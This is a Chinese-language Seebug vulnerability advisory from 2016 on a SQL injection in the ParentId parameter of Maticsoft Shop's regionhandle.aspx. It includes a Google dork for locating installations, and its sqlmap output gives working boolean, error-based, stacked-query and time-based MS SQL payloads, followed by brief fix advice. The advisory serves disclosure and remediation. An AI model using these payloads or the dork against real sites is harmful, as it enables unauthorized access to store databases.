maticsoft Shop商城系统 regionhandle.aspx 参数ParentId SQL注入漏洞

2016-01-20T00:00:00
ID SSV:90542
Type seebug
Reporter kikay
Modified 2016-01-20T00:00:00

Description

动软商城系统是一套集CMS资讯+独立商城+微信商城+手机APP+SNS用户社区于一体的全新电商营销解决方案。主要为企业树立企业品牌形象,实现独立网络推广,充分利用网站SEO、微博、APP,微信等移动客户端多渠道网络营销手段,为您搭建一个全新的营销渠道。

官方主页: http://www.maticsoft.com/

Google Dork:MaticsoftFK

0x02 漏洞细节

通用注入

http://shop1.maticsoft.cn/regionhandle.aspx 页面中 ParentId 过滤不严,造成post注入

sqlmap过程:

``` Place: POST

Parameter: ParentId

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: Action=GetChildNode&ParentId=214 AND 2697=2697

Vector: AND [INFERENCE]

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: Action=GetChildNode&ParentId=214 AND 7244=CONVERT(INT,(CHAR(58)+CHAR(104)+CHAR(102)+CHAR(101)+CHAR(58)+(SELECT (CASE WHEN (7244=7244) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(120)+CHAR(114)+CHAR(121)+CHAR(58)))

Vector: AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: Action=GetChildNode&ParentId=214; WAITFOR DELAY '0:0:5';--

Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: Action=GetChildNode&ParentId=214 WAITFOR DELAY '0:0:5'--

Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

```

示例:

0x03 修复方案

1、过滤 regionhandle.aspx 文件 ParentId 参数

2、使用加速乐等防护产品